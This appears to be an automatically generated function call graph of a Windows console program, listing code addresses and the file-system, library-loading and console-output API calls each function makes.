27408 1fb204 VariantClear 27407->27408 27418 1fed7b 27407->27418 27408->27418 27409 1fef2c 27602 1fe954 19 API calls 27409->27602 27410 1feff6 27603 1d4d78 10 API calls 27410->27603 27411 1feebc 27414 1d339c 4 API calls 27411->27414 27415 1feefa 27411->27415 27414->27415 27415->27409 27415->27410 27416 1fee32 27421 1fee55 27416->27421 27430 1fee0f 27416->27430 27601 1fdfa4 14 API calls 27416->27601 27417 1dae2c VariantClear 27417->27403 27418->27403 27418->27411 27418->27416 27418->27430 27600 1d34c0 malloc _CxxThrowException SysStringLen free 27418->27600 27419 1fef3e 27419->27403 27422 1d339c 4 API calls 27419->27422 27423 1fef8f 27419->27423 27425 1dae2c VariantClear 27421->27425 27422->27423 27423->27403 27426 1fefe0 free free 27423->27426 27425->27411 27426->27403 27427 1fee7a 27428 1fb204 VariantClear 27427->27428 27427->27430 27429 1fee9b 27428->27429 27429->27421 27429->27430 27430->27417 27432 1fb234 27431->27432 27433 1dae2c VariantClear 27432->27433 27434 1e49de 27433->27434 27434->27060 27434->27105 27436 1e2023 27435->27436 27437 1dae2c VariantClear 27436->27437 27438 1e206a 27437->27438 27438->27105 27438->27121 27440 1d3208 2 API calls 27439->27440 27442 1f63f5 27440->27442 27441 1e50fa 27441->27133 27441->27135 27441->27143 27442->27441 27443 1d362c 6 API calls 27442->27443 27443->27442 27445 1d7edf 27444->27445 27446 1d7ee9 27445->27446 27448 1d7fca 27445->27448 27447 1d339c 4 API calls 27446->27447 27450 1d7f14 27447->27450 27451 1d3274 3 API calls 27448->27451 27452 1d8253 27448->27452 27449 1d7f8c 27455 1d91dc 51 API calls 27449->27455 27450->27449 27453 1d7f2e 27450->27453 27454 1d7ff9 27451->27454 27459 1d8306 27452->27459 27461 1d8296 27452->27461 27621 1dabb0 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 27453->27621 27457 1d3274 3 API calls 27454->27457 27458 1d7fa2 27455->27458 27472 1d8007 27457->27472 27466 1d89d8 CloseHandle 27458->27466 27463 1d831e 27459->27463 27467 1d8326 27459->27467 27482 1d8377 27459->27482 27460 1d7f75 27460->27449 27462 1d7f79 27460->27462 27626 1d7d4c 27461->27626 27465 1d7fc3 27462->27465 27469 1d7d4c 39 API calls 27463->27469 27465->27196 27465->27213 27466->27465 27478 1d82e7 27467->27478 27604 1d7978 27467->27604 27469->27467 27476 1d8051 27472->27476 27622 1d3670 malloc _CxxThrowException memmove free _CxxThrowException 27472->27622 27473 1d82b8 27474 1d339c 4 API calls 27473->27474 27474->27478 27477 1d80b1 27476->27477 27479 1d8075 27476->27479 27480 1d7ebc 72 API calls 27477->27480 27618 1d794c 27478->27618 27481 1d80af 27479->27481 27484 1d3404 4 API calls 27479->27484 27483 1d80b9 27480->27483 27487 1d3314 3 API calls 27481->27487 27482->27467 27485 1d3274 3 API calls 27482->27485 27483->27481 27486 1d823e free free 27483->27486 27484->27481 27492 1d83b9 27485->27492 27486->27452 27488 1d80e3 27487->27488 27489 1d3208 2 API calls 27488->27489 27490 1d80ee 27489->27490 27623 1d7ce0 44 API calls 27490->27623 27493 1d7978 39 API calls 27492->27493 27494 1d8435 27493->27494 27496 1d8439 wcscmp 27494->27496 27498 1d847c 27494->27498 27495 1d815a free free 27500 1d794c FindClose 27495->27500 27496->27498 27499 1d8459 27496->27499 27497 1d818a SetLastError free free 27504 1d794c FindClose 27497->27504 27501 1d7d4c 39 API calls 27498->27501 27506 1d339c 4 API calls 27499->27506 27502 1d8179 free 27500->27502 27503 1d848c 27501->27503 27507 1d822d free 27502->27507 27508 1d84b3 27503->27508 27511 1d84a7 free 27503->27511 27509 1d81b5 free 27504->27509 27510 1d846b free 27506->27510 27507->27465 27512 1d339c 4 API calls 27508->27512 27509->27507 27510->27478 27511->27467 27515 1d84e4 free 27512->27515 27513 1d812a free 27516 1d3208 2 API calls 27513->27516 27514 1d81c3 27517 1d362c 6 API calls 27514->27517 27515->27478 27518 1d8106 27516->27518 27519 1d81ee free free 27517->27519 27518->27495 27518->27497 27518->27513 27518->27514 27624 1d2748 CharUpperW CharUpperW 27518->27624 27625 1d7ce0 44 API calls 27518->27625 27521 1d794c FindClose 27519->27521 27522 1d821e free 27521->27522 27522->27507 27524 1d68bb 27523->27524 27525 1d68d5 27524->27525 27526 1d68c2 SetFileAttributesW 27524->27526 27527 1d68d1 27525->27527 27528 1d3208 2 API calls 27525->27528 27526->27525 27526->27527 27527->27340 27529 1d68e3 27528->27529 27530 1da7ec 35 API calls 27529->27530 27531 1d68f8 27530->27531 27532 1d691c free 27531->27532 27533 1d68fc SetFileAttributesW free 27531->27533 27532->27527 27533->27527 27535 1d8cdc 39 API calls 27534->27535 27536 1d9242 27535->27536 27536->27260 27536->27321 27538 1d8a60 2 API calls 27537->27538 27539 1d8aef 27538->27539 27539->27278 27597 1e211c 13 API calls 27539->27597 27542->27083 27543->27094 27544->27068 27545->27068 27546->27074 27547->27074 27548->27067 27549->27071 27550->27080 27551->27103 27552->27080 27553->27128 27554->27137 27555->27151 27556->27155 27557->27152 27558->27234 27559->27178 27560->27233 27637 1d312c 27561->27637 27563 1d31b4 free 27563->27275 27564->27235 27565->27267 27566->27262 27567->27301 27568->27303 27569->27341 27570->27250 27571->27285 27573 1d3208 2 API calls 27572->27573 27574 1d8683 27573->27574 27575 1d7ebc 90 API calls 27574->27575 27576 1d8691 free 27575->27576 27576->27256 27578->27292 27579->27335 27580->27211 27581->27222 27582->27252 27583->27293 27584->27324 27585->27349 27586->27372 27587->27360 27588->27385 27589->27390 27590->27391 27591->27395 27592->27210 27593->27298 27594->27339 27595->27283 27596->27365 27597->27379 27598->27356 27599->27405 27601->27427 27602->27419 27603->27403 27605 1d794c FindClose 27604->27605 27607 1d799b 27605->27607 27606 1d7a13 27606->27478 27607->27606 27608 1d79c3 27607->27608 27609 1d79b2 FindFirstFileW 27607->27609 27610 1d7a0d 27608->27610 27612 1d3208 2 API calls 27608->27612 27609->27608 27610->27606 27611 1d339c 4 API calls 27610->27611 27611->27606 27613 1d79d7 27612->27613 27614 1da7ec 35 API calls 27613->27614 27615 1d79ec 27614->27615 27616 1d79f0 FindFirstFileW 27615->27616 27617 1d7a03 free 27615->27617 27616->27617 27617->27610 27619 1d7968 27618->27619 27620 1d795b FindClose 27618->27620 27619->27465 27620->27619 27621->27460 27622->27476 27623->27518 27624->27518 27625->27518 27627 1d7d64 27626->27627 27628 1d7d79 27627->27628 27629 1d7d6b GetFileAttributesW 27627->27629 27630 1d7dc5 27628->27630 27631 1d3208 2 API calls 27628->27631 27629->27628 27629->27630 27630->27467 27630->27473 27632 1d7d87 27631->27632 27633 1da7ec 35 API calls 27632->27633 27634 1d7d9c 27633->27634 27635 1d7dbb free 27634->27635 27636 1d7da0 GetFileAttributesW free 27634->27636 27635->27630 27636->27630 27638 1d2fbc 2 API calls 27637->27638 27639 1d3154 memmove memmove 27638->27639 27639->27563 27640 21e1a6 27641 21e1bd __set_app_type 27640->27641 27642 21e201 27641->27642 27643 21e217 _initterm __getmainargs _initterm 27642->27643 27644 21e28c 27643->27644 27645 21e2a3 27644->27645 27646 21e29b _cexit 27644->27646 27646->27645 27647 21ab29 27648 21abd1 27647->27648 27651 210524 SetConsoleCtrlHandler 27648->27651 27652 1f9a34 27653 1f9a9e 27652->27653 27654 1f9a54 27652->27654 27654->27653 27655 1f9a80 free 27654->27655 27658 1d6464 27655->27658 27659 1d6475 FreeLibrary 27658->27659 27660 1d647f free 27658->27660 27659->27660 27660->27654 27661 2049b0 27681 1fcd8c 27661->27681 27663 1d3208 2 API calls 27664 2049e7 27663->27664 27666 1d3208 2 API calls 27664->27666 27667 2049f2 27666->27667 27671 204a25 27667->27671 27688 1d6e30 27667->27688 27672 204a57 free free 27671->27672 27675 204a72 27671->27675 27674 204b22 27672->27674 27673 204b0a free free 27673->27674 27675->27673 27676 1d318c 4 API calls 27675->27676 27677 1d2130 2 API calls 27675->27677 27678 1d3314 3 API calls 27675->27678 27679 1db8f0 4 API calls 27675->27679 27676->27675 27677->27675 27678->27675 27680 204ade free 27679->27680 27680->27675 27682 1d3208 2 API calls 27681->27682 27683 1fcddd 27682->27683 27684 1d3208 2 API calls 27683->27684 27685 1fcdf0 27684->27685 27686 1d3208 2 API calls 27685->27686 27687 1fcdfe 27686->27687 27687->27663 27689 1d6e47 27688->27689 27690 1d6e59 27689->27690 27691 1d339c 4 API calls 27689->27691 27692 1d339c 4 API calls 27690->27692 27691->27690 27693 1d6e73 27692->27693 27694 1fcf80 27693->27694 27695 1d3404 4 API calls 27694->27695 27696 1fcfa1 27695->27696 27697 1d318c 4 API calls 27696->27697 27698 1fcfb2 27697->27698 27699 1d7ebc 90 API calls 27698->27699 27700 1fcfbf free 27699->27700 27701 1fcfec 27700->27701 27702 1fcfd2 _CxxThrowException 27700->27702 27703 1fd02a 27701->27703 27704 1fd015 free free 27701->27704 27702->27701 27703->27671 27704->27701 27705 1e1e0c 27706 1e1e30 27705->27706 27707 1e1e3f 27705->27707 27706->27707 27709 210a1c EnterCriticalSection 27706->27709 27710 210a60 LeaveCriticalSection 27709->27710 27711 210a53 27709->27711 27710->27707 27713 21b480 27711->27713 27714 21b4a7 27713->27714 27715 21b49e GetTickCount 27713->27715 27718 21b4d8 strcmp 27714->27718 27724 21b50c 27714->27724 27745 21b7aa 27714->27745 27715->27714 27719 21b4ec 27718->27719 27718->27724 27721 21b4f7 wcscmp 27719->27721 27719->27724 27720 21b575 27760 1d2cdc 27720->27760 27721->27724 27722 21b55e strcmp 27722->27720 27722->27745 27724->27745 27754 21b264 27724->27754 27725 21b714 27729 21b72c 27725->27729 27730 21b71c strcmp 27725->27730 27726 21b584 27727 21b5c8 27726->27727 27774 1d2db8 27726->27774 27734 21b5fd 27727->27734 27778 1d2e04 malloc _CxxThrowException memmove free _CxxThrowException 27727->27778 27765 21b1c8 27729->27765 27730->27729 27732 21b76a 27730->27732 27736 1d2cdc 3 API calls 27732->27736 27734->27725 27735 1d3404 4 API calls 27734->27735 27738 21b646 27735->27738 27739 21b79a 27736->27739 27779 1d2438 9 API calls 27738->27779 27744 1d3404 4 API calls 27739->27744 27740 21b752 27784 1d22e4 fflush 27740->27784 27741 21b75e 27743 1d2cdc 3 API calls 27741->27743 27743->27732 27744->27745 27745->27710 27747 21b6f0 27783 1d2e04 malloc _CxxThrowException memmove free _CxxThrowException 27747->27783 27749 1d3404 4 API calls 27752 21b663 27749->27752 27752->27747 27752->27749 27780 1d38c8 memmove 27752->27780 27781 1d3a64 6 API calls 27752->27781 27782 1d2438 9 API calls 27752->27782 27755 21b27e 27754->27755 27756 21b2a8 strlen 27755->27756 27758 21b2c9 27756->27758 27757 1d2db8 5 API calls 27759 21b305 27757->27759 27758->27757 27759->27720 27759->27722 27761 1d2d11 27760->27761 27762 1d2cf0 27760->27762 27761->27726 27762->27761 27763 1d2130 2 API calls 27762->27763 27764 1d2d00 free 27763->27764 27764->27761 27766 21b1e2 27765->27766 27767 21b238 27765->27767 27769 21b1f3 27766->27769 27785 1d2b04 malloc _CxxThrowException _CxxThrowException free 27766->27785 27768 21b249 fputs 27767->27768 27786 1d22e4 fflush 27767->27786 27768->27740 27768->27741 27772 21b215 fputs 27769->27772 27773 21b205 memset 27769->27773 27772->27767 27773->27772 27775 1d2dcd 27774->27775 27787 1d2b9c 27775->27787 27778->27734 27779->27752 27780->27752 27781->27752 27782->27752 27783->27725 27784->27741 27785->27769 27786->27768 27788 1d2bae 27787->27788 27789 1d2bc3 27787->27789 27791 1d2a9c malloc _CxxThrowException memmove free _CxxThrowException 27788->27791 27789->27727 27791->27789 27792 218817 27793 21882c 27792->27793 27794 21881c fputs 27792->27794 27938 1e0dcc 27793->27938 27794->27793 27796 218841 27797 218899 27796->27797 27798 218878 GetStdHandle GetConsoleScreenBufferInfo 27796->27798 27799 1d2130 2 API calls 27797->27799 27798->27797 27800 2188ac 27799->27800 28048 217c40 27800->28048 27804 2189a2 27805 2189a7 _CxxThrowException 27804->27805 27810 2189c3 27804->27810 27805->27810 27806 218a78 28092 204c2c 27806->28092 27808 218a54 _CxxThrowException 27808->27806 27810->27806 27810->27808 28113 1d32bc 27810->28113 27812 218aad _CxxThrowException 27829 218ad1 27812->27829 27815 1d362c 6 API calls 27818 218a2a 27815->27818 27816 218bb3 27822 218c21 27816->27822 28119 1dbf04 22 API calls 27816->28119 27821 1d3314 3 API calls 27818->27821 27819 218bb8 _CxxThrowException 27819->27816 27820 218c00 27820->27822 27823 218c05 _CxxThrowException 27820->27823 27824 218a3f _CxxThrowException 27821->27824 28105 1d2300 fputc 27822->28105 27823->27822 27824->27808 27827 218c58 fputs 28106 1d2300 fputc 27827->28106 27828 218b98 free 27828->27816 27828->27829 27829->27816 27829->27819 27829->27828 28117 1f9644 11 API calls 27829->28117 28118 1de9c8 malloc _CxxThrowException memmove free memmove 27829->28118 27831 218cbc 28107 1d2300 fputc 27831->28107 27834 218cc4 fputs 28108 1d2300 fputc 27834->28108 27838 218cdc strlen 27840 21902b 27838->27840 27841 218d08 27838->27841 27839 218c70 27839->27831 28120 21640c fputc fputs fputs fputc 27839->28120 28121 1d2300 fputc 27839->28121 28109 1d2300 fputc 27840->28109 28122 21640c fputc fputs fputs fputc 27841->28122 27844 21903b fputs 28110 1d2300 fputc 27844->28110 27852 21906d fputs fputc 27855 219053 27852->27855 27856 219096 fputc 27852->27856 27855->27852 27896 21914d 27855->27896 28123 1d2670 fputs 27855->28123 27857 2190ae fputc fputc fputc 27856->27857 27862 219100 27857->27862 27861 2192ab 28111 1d2300 fputc 27861->28111 28124 2163b8 fputc fputs 27862->28124 27864 2192b3 fputs 28112 1d2300 fputc 27864->28112 27875 2192e2 fputs fputc 27878 2192cb 27875->27878 27878->27875 27914 219395 27878->27914 28132 2163b8 fputc fputs 27878->28132 27882 219489 27889 21a5c5 27882->27889 27893 21a5c0 27882->27893 27884 2191a2 fputc 27884->27896 27894 21a5e7 free 27889->27894 27895 21a5ca _CxxThrowException 27889->27895 28136 2166a8 30 API calls 27893->28136 27899 21a605 27894->27899 27900 21a626 free 27894->27900 27895->27894 27896->27861 27896->27884 27901 2191c4 fputc 27896->27901 27910 2191e4 fputc fputc 27896->27910 28125 21640c fputc fputs fputs fputc 27896->28125 28126 1f89f0 VariantClear 27896->28126 28127 1d2670 fputs 27896->28127 27906 21a609 free 27899->27906 27907 21a63c 27900->27907 27901->27896 27906->27900 27906->27906 28137 217080 6 API calls 27907->28137 28128 1f8a78 VariantClear 27910->28128 27914->27882 28133 21640c fputc fputs fputs fputc 27914->28133 28134 1f8d38 VariantClear 27914->28134 28135 2163b8 fputc fputs 27914->28135 27915 21a64a 28138 1d182c free free free free free 27915->28138 27922 219218 28129 2163b8 fputc fputs 27922->28129 28130 1f8b00 malloc _CxxThrowException free VariantClear 27922->28130 27927 21926c fputc fputs 28131 1d2300 fputc 27927->28131 27931 21928f free 27931->27861 27931->27896 27939 1e0e1b 27938->27939 27940 1e0df5 27938->27940 27942 1d3314 3 API calls 27939->27942 28202 1f02a0 6 API calls 27940->28202 27944 1e0e2c 27942->27944 27943 1e0e09 _CxxThrowException 27943->27939 27945 1e0e4e free 27944->27945 27948 1e0e98 free 27944->27948 28203 1f02a0 6 API calls 27945->28203 27947 1e0e6e _CxxThrowException 27947->27944 27950 1e0ede 27948->27950 27951 1e0ece 27948->27951 27953 1e0f29 wcscmp 27950->27953 27955 1e0f3e 27950->27955 27952 1d4b58 7 API calls 27951->27952 27952->27950 27954 1e0f7b 27953->27954 27953->27955 28204 1f02a0 6 API calls 27954->28204 28139 1dfadc 27955->28139 27957 1e0f8f _CxxThrowException 27957->27955 27960 1dfadc 10 API calls 27961 1e0fee 27960->27961 27962 1e102d 27961->27962 28205 1e0358 189 API calls 27961->28205 27966 1e105c 27962->27966 28206 1e0358 189 API calls 27962->28206 27965 1e1177 28149 1e0160 27965->28149 27966->27965 27967 1e1130 27966->27967 28207 1f02a0 6 API calls 27966->28207 27970 1d3404 4 API calls 27967->27970 27973 1e1141 27970->27973 27972 1e111e _CxxThrowException 27972->27967 27973->27965 28208 1f02a0 6 API calls 27973->28208 27974 1e11f1 27976 1e121e 27974->27976 27977 1d3404 4 API calls 27974->27977 27975 1d3404 4 API calls 27975->27974 28166 1d4b58 27976->28166 27977->27976 27981 1e1165 _CxxThrowException 27981->27965 27984 1e1871 27987 1e18cf 27984->27987 27988 1e1876 27984->27988 27985 1e15e9 28215 1e0998 72 API calls 27985->28215 27986 1e159a 27986->27985 27995 1e1807 27986->27995 28214 1f02a0 6 API calls 27986->28214 27994 1e18d8 _CxxThrowException 27987->27994 28047 1e14fb 27987->28047 27992 1d63d0 57 API calls 27988->27992 27989 1e12d9 28188 1d63d0 27989->28188 27998 1e1882 27992->27998 27995->27984 27995->28047 28233 1f02a0 6 API calls 27995->28233 27996 1e15d7 _CxxThrowException 27996->27985 27997 1e15f8 28216 1def70 27997->28216 28001 1d6360 15 API calls 27998->28001 28004 1e188b 28001->28004 28006 1d4b58 7 API calls 28004->28006 28005 1e185f _CxxThrowException 28005->27984 28006->28047 28009 1e13b2 28011 1e13ed 28009->28011 28210 1e0358 189 API calls 28009->28210 28015 1e141f 28011->28015 28211 1e0358 189 API calls 28011->28211 28012 1e16c8 28016 1e17a8 28012->28016 28021 1e1736 28012->28021 28229 1f02a0 6 API calls 28012->28229 28013 1e13a0 _CxxThrowException 28013->28009 28022 1e143e 28015->28022 28212 1d5164 6 API calls 28015->28212 28020 1e17ca 28016->28020 28023 1d3404 4 API calls 28016->28023 28017 1d3404 4 API calls 28018 1e169d 28017->28018 28018->28012 28228 1d3890 memmove 28018->28228 28020->28047 28232 1f02a0 6 API calls 28020->28232 28021->28016 28028 1e1767 28021->28028 28230 1f02a0 6 API calls 28021->28230 28026 1d63d0 57 API calls 28022->28026 28023->28020 28029 1e144c 28026->28029 28027 1e1724 _CxxThrowException 28027->28021 28028->28016 28231 1f02a0 6 API calls 28028->28231 28198 1f408c 28029->28198 28035 1e17f5 _CxxThrowException 28035->27995 28036 1e1755 _CxxThrowException 28036->28028 28038 1e1796 _CxxThrowException 28038->28016 28039 1d6360 15 API calls 28040 1e1464 28039->28040 28041 1d3404 4 API calls 28040->28041 28043 1e1483 28040->28043 28041->28043 28042 1e14d9 28045 1d3404 4 API calls 28042->28045 28042->28047 28043->28042 28043->28047 28213 1f02a0 6 API calls 28043->28213 28045->28047 28046 1e14c7 _CxxThrowException 28046->28042 28047->27796 28049 1d3208 2 API calls 28048->28049 28050 217c84 28049->28050 28051 1fab74 28050->28051 28052 1faba6 28051->28052 28084 1fabd3 28051->28084 28052->28084 28385 1f94a8 7 API calls 28052->28385 28053 1fae31 28282 1f83c8 28053->28282 28057 1d3208 malloc _CxxThrowException 28057->28084 28060 1d3518 malloc _CxxThrowException free 28060->28084 28064 1fae7f 28067 1fae99 28064->28067 28068 1d339c 4 API calls 28064->28068 28065 1fae7a 28066 1faf7a free 28065->28066 28066->27804 28069 1d31c0 4 API calls 28067->28069 28068->28067 28070 1faeaf 28069->28070 28366 1fa9fc 28070->28366 28075 1faed1 28076 1d31c0 4 API calls 28075->28076 28077 1faee7 28076->28077 28079 1fa9fc 126 API calls 28077->28079 28080 1faef3 free 28079->28080 28080->28065 28085 1faf06 28080->28085 28081 1d2130 malloc _CxxThrowException 28081->28084 28082 1db8f0 malloc _CxxThrowException memmove free 28082->28084 28084->28053 28084->28057 28084->28060 28084->28081 28084->28082 28086 1fadc2 memmove 28084->28086 28087 1fad95 free 28084->28087 28386 1f9d98 28084->28386 28405 1fa034 8 API calls 28084->28405 28406 1f9af0 28084->28406 28413 1f94a8 7 API calls 28084->28413 28085->28065 28090 1faf38 28085->28090 28086->28084 28087->28084 28088 1faf3b GetProcAddress 28088->28090 28090->28088 28091 1faf71 28090->28091 28091->28065 28091->28066 28093 204c5c 28092->28093 28101 204c79 28092->28101 28094 204c60 free 28093->28094 28094->28094 28094->28101 28096 204d9e free 28104 204d9c 28096->28104 28098 204dac free 28098->28104 28099 1d2130 2 API calls 28099->28101 28100 204d63 memmove 28100->28101 28101->28096 28101->28098 28101->28099 28101->28100 28102 1db8f0 4 API calls 28101->28102 28101->28104 28540 1d9a80 malloc _CxxThrowException memmove 28101->28540 28541 1fbb68 16 API calls 28101->28541 28103 204d86 free 28102->28103 28103->28101 28103->28104 28104->27812 28104->27829 28105->27827 28106->27839 28107->27834 28108->27838 28109->27844 28110->27855 28111->27864 28112->27878 28114 1d32d0 28113->28114 28115 1d2fbc 2 API calls 28114->28115 28116 1d32e4 28115->28116 28116->27815 28117->27829 28118->27829 28119->27820 28121->27839 28123->27857 28126->27896 28127->27896 28128->27922 28130->27927 28131->27931 28134->27914 28136->27889 28137->27915 28140 1dfb08 28139->28140 28141 1dfb00 28139->28141 28142 1d3314 3 API calls 28140->28142 28141->27960 28143 1dfb21 28142->28143 28144 1dfb3f free 28143->28144 28146 1dfb4f 28143->28146 28144->28141 28148 1dfbb4 free 28146->28148 28234 1f02a0 6 API calls 28146->28234 28147 1dfba2 _CxxThrowException 28147->28148 28148->28141 28150 1e018f 28149->28150 28151 1d32bc 2 API calls 28150->28151 28161 1e01e4 28150->28161 28153 1e01b0 28151->28153 28152 1e0325 28152->27974 28152->27975 28235 1ded8c 6 API calls 28153->28235 28155 1e02ca 28239 1f02a0 6 API calls 28155->28239 28156 1e01d1 free 28156->28161 28158 1e02de _CxxThrowException 28159 1e02c8 28158->28159 28159->28152 28240 1f02a0 6 API calls 28159->28240 28161->28152 28161->28155 28161->28159 28236 1dfec8 142 API calls 28161->28236 28237 1dfd30 12 API calls 28161->28237 28238 1ded8c 6 API calls 28161->28238 28165 1e0313 _CxxThrowException 28165->28152 28167 1d4b7f 28166->28167 28168 1d4b77 28166->28168 28169 1d4bb6 28167->28169 28171 1d4ba1 free free 28167->28171 28178 1e0c20 28168->28178 28170 1d4bfd 28169->28170 28172 1d2130 2 API calls 28169->28172 28170->28168 28174 1d2130 2 API calls 28170->28174 28177 1d3314 3 API calls 28170->28177 28171->28167 28173 1d4bd3 28172->28173 28175 1d4bdc memmove 28173->28175 28176 1d4bef free 28173->28176 28174->28170 28175->28176 28176->28170 28177->28170 28179 1e0d37 28178->28179 28181 1e0c4a 28178->28181 28179->27986 28179->27989 28180 1d3208 malloc _CxxThrowException 28180->28181 28181->28179 28181->28180 28182 1d3404 4 API calls 28181->28182 28183 1d339c 4 API calls 28181->28183 28184 1d2130 2 API calls 28181->28184 28185 1d3314 malloc _CxxThrowException memmove 28181->28185 28186 1db8f0 4 API calls 28181->28186 28182->28181 28183->28181 28184->28181 28185->28181 28187 1e0d0d free free 28186->28187 28187->28179 28187->28181 28189 1d6419 28188->28189 28190 1d63e5 28188->28190 28191 1d6451 28189->28191 28193 1d643c free free 28189->28193 28190->28189 28241 1d5d18 55 API calls 28190->28241 28194 1d6360 28191->28194 28193->28189 28196 1d6379 28194->28196 28195 1d63c4 28195->28009 28209 1f02a0 6 API calls 28195->28209 28196->28195 28242 1d5bbc 15 API calls 28196->28242 28199 1f409e 28198->28199 28200 1e1458 28198->28200 28199->28200 28243 1f3e14 28199->28243 28200->28039 28202->27943 28203->27947 28204->27957 28205->27962 28206->27966 28207->27972 28208->27981 28209->28013 28210->28011 28211->28015 28212->28022 28213->28046 28214->27996 28215->27997 28217 1def99 28216->28217 28218 1def91 28216->28218 28219 1defd9 28217->28219 28220 1defbb free free free 28217->28220 28218->28012 28218->28017 28221 1d2130 2 API calls 28219->28221 28226 1df020 28219->28226 28220->28217 28222 1deff6 28221->28222 28224 1defff memmove 28222->28224 28225 1df012 free 28222->28225 28223 1d2130 2 API calls 28223->28226 28224->28225 28225->28226 28226->28218 28226->28223 28227 1d3314 malloc _CxxThrowException memmove 28226->28227 28227->28226 28228->28012 28229->28027 28230->28036 28231->28038 28232->28035 28233->28005 28234->28147 28235->28156 28236->28161 28237->28161 28238->28161 28239->28158 28240->28165 28241->28190 28242->28196 28261 1f1370 28243->28261 28246 1f1370 96 API calls 28248 1f3e45 28246->28248 28247 1f4043 28247->28199 28253 1f3ea2 28248->28253 28265 1f01a8 28248->28265 28250 1d318c 4 API calls 28251 1f3fdd 28250->28251 28251->28247 28251->28250 28256 1f3e14 105 API calls 28251->28256 28281 1eff04 malloc _CxxThrowException memmove 28251->28281 28253->28251 28255 1d520c malloc _CxxThrowException memmove memmove free 28253->28255 28258 1f3f6b memmove 28253->28258 28279 1d2748 CharUpperW CharUpperW 28253->28279 28280 1d5424 6 API calls 28253->28280 28255->28253 28257 1f4022 free free 28256->28257 28257->28247 28257->28251 28258->28253 28262 1f13dd 28261->28262 28263 1f1388 28261->28263 28262->28246 28263->28262 28264 1f01a8 96 API calls 28263->28264 28264->28263 28266 1f0259 28265->28266 28267 1f01c8 28265->28267 28266->28248 28267->28266 28268 1d3208 2 API calls 28267->28268 28269 1f01ec 28268->28269 28270 1d318c 4 API calls 28269->28270 28271 1f01fd 28270->28271 28272 1f020c free free 28271->28272 28273 1f0223 28271->28273 28272->28266 28274 1d7ebc 90 API calls 28273->28274 28275 1f0232 28274->28275 28276 1f0244 free free 28275->28276 28277 1d3404 4 API calls 28275->28277 28276->28266 28278 1f0243 28277->28278 28278->28276 28279->28253 28281->28251 28414 1d6570 28282->28414 28285 1d31c0 4 API calls 28286 1f8406 28285->28286 28287 1d8624 91 API calls 28286->28287 28288 1f841b 28287->28288 28289 1d31c0 4 API calls 28288->28289 28310 1f8479 28288->28310 28290 1f8435 28289->28290 28421 1d86dc 91 API calls 28290->28421 28291 1f848b free 28292 1f8499 28291->28292 28294 1f849f free 28292->28294 28295 1f84ad 28292->28295 28294->28295 28296 1f84bd 28295->28296 28297 1f84b3 free 28295->28297 28299 1f85ef 28296->28299 28300 1d3208 2 API calls 28296->28300 28297->28296 28298 1f844a 28301 1d31c0 4 API calls 28298->28301 28298->28310 28302 1d3314 3 API calls 28299->28302 28304 1f84d0 28300->28304 28305 1f8464 28301->28305 28303 1f85fc free 28302->28303 28306 1f860a 28303->28306 28423 1f8290 102 API calls 28304->28423 28422 1d86dc 91 API calls 28305->28422 28333 1d31c0 28306->28333 28309 1f84ec 28311 1f851b 28309->28311 28312 1f84f0 28309->28312 28310->28291 28310->28292 28424 1f8290 102 API calls 28311->28424 28313 1d3314 3 API calls 28312->28313 28315 1f84fd free free 28313->28315 28315->28306 28316 1f8536 28317 1f853a 28316->28317 28318 1f8565 28316->28318 28320 1d3314 3 API calls 28317->28320 28425 1f8290 102 API calls 28318->28425 28321 1f8547 free free 28320->28321 28321->28306 28322 1f8579 28323 1f857d 28322->28323 28324 1f85a5 28322->28324 28325 1d3314 3 API calls 28323->28325 28426 1f8290 102 API calls 28324->28426 28327 1f858a free free 28325->28327 28327->28306 28328 1f85b9 28329 1f85bd 28328->28329 28330 1f85e5 free 28328->28330 28331 1d3314 3 API calls 28329->28331 28330->28299 28332 1f85ca free free 28331->28332 28332->28306 28334 1d31d8 28333->28334 28335 1d312c 4 API calls 28334->28335 28336 1d31fe 28335->28336 28337 1fa7fc 28336->28337 28338 1fa822 28337->28338 28339 1fa872 28338->28339 28488 1d6490 FreeLibrary LoadLibraryExW 28338->28488 28432 1f996c 28339->28432 28342 1fa84d 28344 1fa865 28342->28344 28345 1fa851 28342->28345 28348 1d6464 FreeLibrary 28344->28348 28347 1d6464 FreeLibrary 28345->28347 28346 1d3404 4 API calls 28349 1fa893 28346->28349 28352 1fa85e free 28347->28352 28348->28339 28439 1d64d4 28349->28439 28352->28064 28352->28065 28353 1fa8bf GetProcAddress 28354 1fa8d7 28353->28354 28356 1fa8d5 28353->28356 28357 1fa8fd GetProcAddress 28354->28357 28358 1fa8dd GetProcAddress 28354->28358 28355 1fa981 free 28359 1d6464 FreeLibrary 28355->28359 28356->28354 28444 1f91e0 GetProcAddress GetProcAddress GetProcAddress 28357->28444 28358->28357 28361 1fa8f3 28358->28361 28362 1fa993 free 28359->28362 28360 1fa945 28360->28352 28360->28355 28361->28357 28362->28352 28367 1d3208 2 API calls 28366->28367 28368 1faa29 28367->28368 28495 1d7df4 28368->28495 28370 1faa37 28371 1d3208 2 API calls 28370->28371 28372 1faa4b 28371->28372 28498 1d7e34 28372->28498 28374 1faac0 free 28375 1faacd free 28374->28375 28376 1d794c FindClose 28375->28376 28379 1faae1 free 28376->28379 28377 1d318c 4 API calls 28380 1faa5b 28377->28380 28378 1d7e34 40 API calls 28378->28380 28379->28065 28379->28075 28380->28374 28380->28377 28380->28378 28381 1faab1 28380->28381 28382 1fa7fc 82 API calls 28380->28382 28381->28374 28383 1faa8e free 28382->28383 28383->28380 28384 1faab3 free 28383->28384 28384->28375 28505 1f9bcc 28386->28505 28389 1f9bcc 9 API calls 28401 1f9df2 28389->28401 28390 1f9f25 free 28391 1f9f5b 28390->28391 28393 1f9f33 28390->28393 28392 1f9f0f free free 28404 1f9ee9 28392->28404 28393->28391 28394 1f9f46 free free 28393->28394 28394->28393 28395 1d3208 malloc _CxxThrowException 28395->28401 28396 1d3404 4 API calls 28396->28401 28397 1d3404 4 API calls 28399 1f9e5a wcscmp 28397->28399 28398 1d2130 2 API calls 28398->28401 28399->28401 28400 1d3314 malloc _CxxThrowException memmove 28400->28401 28401->28395 28401->28396 28401->28397 28401->28398 28401->28400 28402 1db8f0 4 API calls 28401->28402 28401->28404 28403 1f9ec4 free free 28402->28403 28403->28401 28403->28404 28404->28390 28404->28392 28405->28084 28407 1d3314 3 API calls 28406->28407 28408 1f9b2b 28407->28408 28525 1f8f60 28408->28525 28415 1d3208 2 API calls 28414->28415 28416 1d6593 28415->28416 28427 1d650c GetModuleFileNameW 28416->28427 28418 1d65a3 28419 1d65dd 28418->28419 28431 1d3518 